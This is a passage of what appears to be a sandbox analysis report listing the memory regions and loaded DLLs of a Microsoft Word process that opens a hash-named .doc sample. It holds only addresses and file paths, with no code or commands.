"\\Windows\\SysWOW64\\d3d10_1core.dll" (normalized: "c:\\windows\\syswow64\\d3d10_1core.dll") Region: id = 405 start_va = 0x6a5a0000 end_va = 0x6a5cbfff monitored = 0 entry_point = 0x6a5c24b0 region_type = mapped_file name = "d3d10_1.dll" filename = "\\Windows\\SysWOW64\\d3d10_1.dll" (normalized: "c:\\windows\\syswow64\\d3d10_1.dll") Region: id = 406 start_va = 0x6a5d0000 end_va = 0x6a6e7fff monitored = 0 entry_point = 0x6a5d40b1 region_type = mapped_file name = "msptls.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSPTLS.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\msptls.dll") Region: id = 407 start_va = 0x6a6f0000 end_va = 0x6a733fff monitored = 0 entry_point = 0x6a70aaf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 408 start_va = 0x6a740000 end_va = 0x6a74efff monitored = 0 entry_point = 0x6a742a50 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\SysWOW64\\wtsapi32.dll" (normalized: "c:\\windows\\syswow64\\wtsapi32.dll") Region: id = 409 start_va = 0x6a750000 end_va = 0x6aad8fff monitored = 0 entry_point = 0x6a7ecc60 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\SysWOW64\\msi.dll" (normalized: "c:\\windows\\syswow64\\msi.dll") Region: id = 410 start_va = 0x6aae0000 end_va = 0x6b891fff monitored = 0 entry_point = 0x6aae1000 region_type = mapped_file name = "mso.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\mso.dll") Region: id = 411 start_va = 0x6b8a0000 end_va = 0x6b8bcfff monitored = 0 entry_point = 0x6b8a7240 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\SysWOW64\\sppc.dll" (normalized: "c:\\windows\\syswow64\\sppc.dll") Region: id = 412 start_va = 0x6b8c0000 end_va = 0x6b8dffff monitored = 0 entry_point = 0x6b8d2810 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\SysWOW64\\slc.dll" (normalized: "c:\\windows\\syswow64\\slc.dll") Region: id = 413 start_va = 0x6b8e0000 end_va = 0x6b8e5fff monitored = 0 entry_point = 0x6b8e1490 region_type = mapped_file name = "msimg32.dll" filename = "\\Windows\\SysWOW64\\msimg32.dll" (normalized: "c:\\windows\\syswow64\\msimg32.dll") Region: id = 414 start_va = 0x6b8f0000 end_va = 0x6be87fff monitored = 0 entry_point = 0x6b8f1000 region_type = mapped_file name = "mso99lwin32client.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\Mso99Lwin32client.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\mso99lwin32client.dll") Region: id = 415 start_va = 0x6be90000 end_va = 0x6c5a4fff monitored = 0 entry_point = 0x6be91000 region_type = mapped_file name = "mso40uiwin32client.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\Mso40UIwin32client.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\mso40uiwin32client.dll") Region: id = 416 start_va = 0x6c5b0000 end_va = 0x6c8b1fff monitored = 0 entry_point = 0x6c5b1000 region_type = mapped_file name = "mso30win32client.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\Mso30win32client.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\mso30win32client.dll") Region: id = 417 start_va = 0x6c8c0000 end_va = 0x6ca94fff monitored = 0 entry_point = 0x6c8c1000 region_type = mapped_file name = "mso20win32client.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\Mso20win32client.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\mso20win32client.dll") Region: id = 418 start_va = 0x6caa0000 end_va = 0x6d691fff monitored = 0 entry_point = 0x6caa1000 region_type = mapped_file name = "oart.dll" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\OART.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\oart.dll") Region: id = 419 start_va = 0x6d6a0000 end_va = 0x6d70ffff monitored = 0 entry_point = 0x6d6dec20 region_type = mapped_file name = "msvcp140.dll" filename = "\\Windows\\SysWOW64\\msvcp140.dll" (normalized: "c:\\windows\\syswow64\\msvcp140.dll") Region: id = 420 start_va = 0x6d710000 end_va = 0x6d87afff monitored = 0 entry_point = 0x6d77e360 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_538a540779726150\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_538a540779726150\\gdiplus.dll") Region: id = 421 start_va = 0x6d880000 end_va = 0x6f4e1fff monitored = 0 entry_point = 0x6d881000 region_type = mapped_file name = "wwlib.dll" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\WWLIB.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\wwlib.dll") Region: id = 422 start_va = 0x6f4f0000 end_va = 0x6f5d0fff monitored = 0 entry_point = 0x6f51e6b0 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\SysWOW64\\ucrtbase.dll" (normalized: "c:\\windows\\syswow64\\ucrtbase.dll") Region: id = 423 start_va = 0x6f5e0000 end_va = 0x6f5f3fff monitored = 0 entry_point = 0x6f5ee290 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Windows\\SysWOW64\\vcruntime140.dll" (normalized: "c:\\windows\\syswow64\\vcruntime140.dll") Region: id = 424 start_va = 0x6f8b0000 end_va = 0x6f8dcfff monitored = 0 entry_point = 0x6f8c2b00 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\SysWOW64\\xmllite.dll" (normalized: "c:\\windows\\syswow64\\xmllite.dll") Region: id = 425 start_va = 0x6fa40000 end_va = 0x6fb8afff monitored = 0 entry_point = 0x6faa1660 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 426 start_va = 0x6fb90000 end_va = 0x6fbc2fff monitored = 0 entry_point = 0x6fba0e70 region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\SysWOW64\\mlang.dll" (normalized: "c:\\windows\\syswow64\\mlang.dll") Region: id = 427 start_va = 0x6fbd0000 end_va = 0x6fbd9fff monitored = 0 entry_point = 0x6fbd3200 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 428 start_va = 0x6fcf0000 end_va = 0x6ff07fff monitored = 0 entry_point = 0x6fd997b0 region_type = mapped_file name = "d3d10warp.dll" filename = "\\Windows\\SysWOW64\\d3d10warp.dll" (normalized: "c:\\windows\\syswow64\\d3d10warp.dll") Region: id = 429 start_va = 0x70660000 end_va = 0x7072cfff monitored = 0 entry_point = 0x706b29c0 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\SysWOW64\\twinapi.appcore.dll" (normalized: "c:\\windows\\syswow64\\twinapi.appcore.dll") Region: id = 430 start_va = 0x70730000 end_va = 0x707d6fff monitored = 0 entry_point = 0x70766240 region_type = mapped_file name = "dcomp.dll" filename = "\\Windows\\SysWOW64\\dcomp.dll" (normalized: "c:\\windows\\syswow64\\dcomp.dll") Region: id = 431 start_va = 0x707e0000 end_va = 0x709f9fff monitored = 0 entry_point = 0x70875550 region_type = mapped_file name = "d3d11.dll" filename = "\\Windows\\SysWOW64\\d3d11.dll" (normalized: "c:\\windows\\syswow64\\d3d11.dll") Region: id = 432 start_va = 0x70ae0000 end_va = 0x70b62fff monitored = 0 entry_point = 0x70b037c0 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\SysWOW64\\dxgi.dll" (normalized: "c:\\windows\\syswow64\\dxgi.dll") Region: id = 433 start_va = 0x70b70000 end_va = 0x70d60fff monitored = 0 entry_point = 0x70c53cd0 region_type = mapped_file name = "dwrite.dll" filename = "\\Windows\\SysWOW64\\DWrite.dll" (normalized: "c:\\windows\\syswow64\\dwrite.dll") Region: id = 434 start_va = 0x70d70000 end_va = 0x711fdfff monitored = 0 entry_point = 0x710fa320 region_type = mapped_file name = "d2d1.dll" filename = "\\Windows\\SysWOW64\\d2d1.dll" (normalized: "c:\\windows\\syswow64\\d2d1.dll") Region: id = 435 start_va = 0x713a0000 end_va = 0x713bcfff monitored = 0 entry_point = 0x713a3b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 436 start_va = 0x71560000 end_va = 0x7157afff monitored = 0 entry_point = 0x71569050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 437 start_va = 0x72cb0000 end_va = 0x72d24fff monitored = 0 entry_point = 0x72ce9a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 438 start_va = 0x72dd0000 end_va = 0x72fdefff monitored = 0 entry_point = 0x72e7b0a0 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll") Region: id = 439 start_va = 0x73ef0000 end_va = 0x73ef9fff monitored = 0 entry_point = 0x73ef2a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 440 start_va = 0x73f00000 end_va = 0x73f1dfff monitored = 0 entry_point = 0x73f0b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 441 start_va = 0x73f20000 end_va = 0x73f2efff monitored = 0 entry_point = 0x73f22e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 442 start_va = 0x73f30000 end_va = 0x73f8efff monitored = 0 entry_point = 0x73f34af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 443 start_va = 0x741b0000 end_va = 0x741dafff monitored = 0 entry_point = 0x741b5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 444 start_va = 0x74340000 end_va = 0x743c3fff monitored = 0 entry_point = 0x74366220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 445 start_va = 0x743d0000 end_va = 0x74516fff monitored = 0 entry_point = 0x743e1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 446 start_va = 0x74520000 end_va = 0x745acfff monitored = 0 entry_point = 0x74569b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 447 start_va = 0x745b0000 end_va = 0x74aa8fff monitored = 0 entry_point = 0x747b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 448 start_va = 0x74ab0000 end_va = 0x74bfefff monitored = 0 entry_point = 0x74b66820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 449 start_va = 0x74dc0000 end_va = 0x74eaafff monitored = 0 entry_point = 0x74dfd650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 450 start_va = 0x74eb0000 end_va = 0x762aefff monitored = 0 entry_point = 0x7506b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 451 start_va = 0x762b0000 end_va = 0x7646cfff monitored = 0 entry_point = 0x76392a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 452 start_va = 0x76470000 end_va = 0x764b3fff monitored = 0 entry_point = 0x76477410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 453 start_va = 0x764e0000 end_va = 0x765fefff monitored = 0 entry_point = 0x76525980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 454 start_va = 0x76600000 end_va = 0x7667afff monitored = 0 entry_point = 0x7661e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 455 start_va = 0x76680000 end_va = 0x76711fff monitored = 0 entry_point = 0x766b8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 456 start_va = 0x76720000 end_va = 0x767fffff monitored = 0 entry_point = 0x76733980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 457 start_va = 0x76800000 end_va = 0x76836fff monitored = 0 entry_point = 0x76803b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 458 start_va = 0x76840000 end_va = 0x76897fff monitored = 0 entry_point = 0x768825c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 459 start_va = 0x76910000 end_va = 0x76a8dfff monitored = 0 entry_point = 0x769c1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 460 start_va = 0x76a90000 end_va = 0x76b4dfff monitored = 0 entry_point = 0x76ac5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 461 start_va = 0x76c00000 end_va = 0x76cacfff monitored = 0 entry_point = 0x76c14f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 462 start_va = 0x76cb0000 end_va = 0x76cf3fff monitored = 0 entry_point = 0x76cc9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 463 start_va = 0x76d00000 end_va = 0x76d44fff monitored = 0 entry_point = 0x76d1de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 464 start_va = 0x76d50000 end_va = 0x76d5bfff monitored = 0 entry_point = 0x76d53930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 465 start_va = 0x77170000 end_va = 0x771c9fff monitored = 0 entry_point = 0x77197e70 region_type = mapped_file name = "coml2.dll" filename = "\\Windows\\SysWOW64\\coml2.dll" (normalized: "c:\\windows\\syswow64\\coml2.dll") Region: id = 466 start_va = 0x771d0000 end_va = 0x7734afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 467 start_va = 0x7fea0000 end_va = 0x7feaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fea0000" filename = "" Region: id = 468 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 469 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 470 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 471 start_va = 0x7fff0000 end_va = 0x7ffa1676ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 472 start_va = 0x7ffa16770000 end_va = 0x7ffa16930fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 473 start_va = 0x7ffa16931000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffa16931000" filename = "" Region: id = 474 start_va = 0x717a0000 end_va = 0x7191dfff monitored = 0 entry_point = 0x7181c630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 475 start_va = 0x73b80000 end_va = 0x73e4afff monitored = 0 entry_point = 0x73dbc4c0 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 476 start_va = 0xc50000 end_va = 0xc50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c50000" filename = "" Region: id = 477 start_va = 0xf360000 end_va = 0xf75ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000f360000" filename = "" Region: id = 478 start_va = 0xf760000 end_va = 0xfbdcfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "3af042bd0b5a186b98920cf0b7066344609d6d6deb163ffb0b60325dcca66e44.docd6d6deb163ffb0b60325dcca66e44doc" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\3af042bd0b5a186b98920cf0b7066344609d6d6deb163ffb0b60325dcca66e44.docd6d6deb163ffb0b60325dcca66e44doc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\3af042bd0b5a186b98920cf0b7066344609d6d6deb163ffb0b60325dcca66e44.docd6d6deb163ffb0b60325dcca66e44doc") Region: id = 479 start_va = 0x6f8a0000 end_va = 0x6f8a9fff monitored = 0 entry_point = 0x6f8a2a34 region_type = mapped_file name = "wordcnvpxy.cnv" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\Wordcnvpxy.cnv" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\wordcnvpxy.cnv") Region: id = 480 start_va = 0x6f8a0000 end_va = 0x6f8a9fff monitored = 0 entry_point = 0x6f8a2a34 region_type = mapped_file name = "wordcnvpxy.cnv" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\Wordcnvpxy.cnv" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\wordcnvpxy.cnv") Region: id = 481 start_va = 0x6f8a0000 end_va = 0x6f8abfff monitored = 0 entry_point = 0x6f8a28fd region_type = mapped_file name = "recovr32.cnv" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\RECOVR32.CNV" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\recovr32.cnv") Region: id = 482 start_va = 0x6f840000 end_va = 0x6f85ffff monitored = 0 entry_point = 0x6f84c7d4 region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\msconv97.dll") Region: id = 483 start_va = 0x6f820000 end_va = 0x6f851fff monitored = 0 entry_point = 0x6f83c742 region_type = mapped_file name = "wpft532.cnv" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\WPFT532.CNV" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\wpft532.cnv") Region: id = 484 start_va = 0x6f800000 end_va = 0x6f81ffff monitored = 0 entry_point = 0x6f80c7d4 region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\msconv97.dll") Region: id = 485 start_va = 0x6f820000 end_va = 0x6f85efff monitored = 0 entry_point = 0x6f844c50 region_type = mapped_file name = "wpft632.cnv" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\WPFT632.CNV" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\wpft632.cnv") Region: id = 486 start_va = 0x6f800000 end_va = 0x6f81ffff monitored = 0 entry_point = 0x6f80c7d4 region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\msconv97.dll") Region: id = 487 start_va = 0x6f820000 end_va = 0x6f851fff monitored = 0 entry_point = 0x6f83c742 region_type = mapped_file name = "wpft532.cnv" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\WPFT532.CNV" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\wpft532.cnv") Region: id = 488 start_va = 0x6f800000 end_va = 0x6f81ffff monitored = 0 entry_point = 0x6f80c7d4 region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\msconv97.dll") Region: id = 489 start_va = 0xf360000 end_va = 0xf75ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000f360000" filename = "" Region: id = 490 start_va = 0xf760000 end_va = 0xfbdcfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "3af042bd0b5a186b98920cf0b7066344609d6d6deb163ffb0b60325dcca66e44.doc" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\3af042bd0b5a186b98920cf0b7066344609d6d6deb163ffb0b60325dcca66e44.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\3af042bd0b5a186b98920cf0b7066344609d6d6deb163ffb0b60325dcca66e44.doc") Region: id = 491 start_va = 0x6f820000 end_va = 0x6f85efff monitored = 0 entry_point = 0x6f844c50 region_type = mapped_file name = "wpft632.cnv" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\WPFT632.CNV" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\wpft632.cnv") Region: id = 492 start_va = 0x6f800000 end_va = 0x6f81ffff monitored = 0 entry_point = 0x6f80c7d4 region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\msconv97.dll") Region: id = 493 start_va = 0xf360000 end_va = 0xf75ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000f360000" filename = "" Region: id = 494 start_va = 0xce40000 end_va = 0xd07efff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "3af042bd0b5a186b98920cf0b7066344609d6d6deb163ffb0b60325dcca66e44.doc" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\3af042bd0b5a186b98920cf0b7066344609d6d6deb163ffb0b60325dcca66e44.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\3af042bd0b5a186b98920cf0b7066344609d6d6deb163ffb0b60325dcca66e44.doc") Region: id = 495 start_va = 0xf360000 end_va = 0xf75ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000f360000" filename = "" Region: id = 496 start_va = 0xf760000 end_va = 0xfbdcfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "3af042bd0b5a186b98920cf0b7066344609d6d6deb163ffb0b60325dcca66e44.doc" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\3af042bd0b5a186b98920cf0b7066344609d6d6deb163ffb0b60325dcca66e44.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\3af042bd0b5a186b98920cf0b7066344609d6d6deb163ffb0b60325dcca66e44.doc") Region: id = 497 start_va = 0x6f820000 end_va = 0x6f851fff monitored = 0 entry_point = 0x6f83c742 region_type = mapped_file name = "wpft532.cnv" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\WPFT532.CNV" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\wpft532.cnv") Region: id = 498 start_va = 0x6f800000 end_va = 0x6f81ffff monitored = 0 entry_point = 0x6f80c7d4 region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\msconv97.dll") Region: id = 499 start_va = 0xf360000 end_va = 0xf75ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000f360000" filename = "" Region: id = 500 start_va = 0xf760000 end_va = 0xfbdcfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "3af042bd0b5a186b98920cf0b7066344609d6d6deb163ffb0b60325dcca66e44.doc" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\3af042bd0b5a186b98920cf0b7066344609d6d6deb163ffb0b60325dcca66e44.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\3af042bd0b5a186b98920cf0b7066344609d6d6deb163ffb0b60325dcca66e44.doc") Region: id = 501 start_va = 0x6f820000 end_va = 0x6f85efff monitored = 0 entry_point = 0x6f844c50 region_type = mapped_file name = "wpft632.cnv" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\WPFT632.CNV" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\wpft632.cnv") Region: id = 502 start_va = 0x6f800000 end_va = 0x6f81ffff monitored = 0 entry_point = 0x6f80c7d4 region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\msconv97.dll") Region: id = 503 start_va = 0xf360000 end_va = 0xf75ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000f360000" filename = "" Region: id = 504 start_va = 0xce40000 end_va = 0xd07efff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "3af042bd0b5a186b98920cf0b7066344609d6d6deb163ffb0b60325dcca66e44.doc" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\3af042bd0b5a186b98920cf0b7066344609d6d6deb163ffb0b60325dcca66e44.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\3af042bd0b5a186b98920cf0b7066344609d6d6deb163ffb0b60325dcca66e44.doc") Region: id = 505 start_va = 0xf360000 end_va = 0xf75ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000f360000" filename = "" Region: id = 506 start_va = 0xf760000 end_va = 0xfbdcfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "3af042bd0b5a186b98920cf0b7066344609d6d6deb163ffb0b60325dcca66e44.doc" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\3af042bd0b5a186b98920cf0b7066344609d6d6deb163ffb0b60325dcca66e44.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\3af042bd0b5a186b98920cf0b7066344609d6d6deb163ffb0b60325dcca66e44.doc") Region: id = 507 start_va = 0xf360000 end_va = 0xf75ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000f360000" filename = "" Region: id = 508 start_va = 0xf360000 end_va = 0xfb5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f360000" filename = "" Region: id = 509 start_va = 0xfb60000 end_va = 0xff2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fb60000" filename = "" Region: id = 510 start_va = 0xff30000 end_va = 0x102fcfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ff30000" filename = "" Region: id = 511 start_va = 0xce40000 end_va = 0xd02ffff monitored = 1 entry_point = 0x0 region_type = private name = 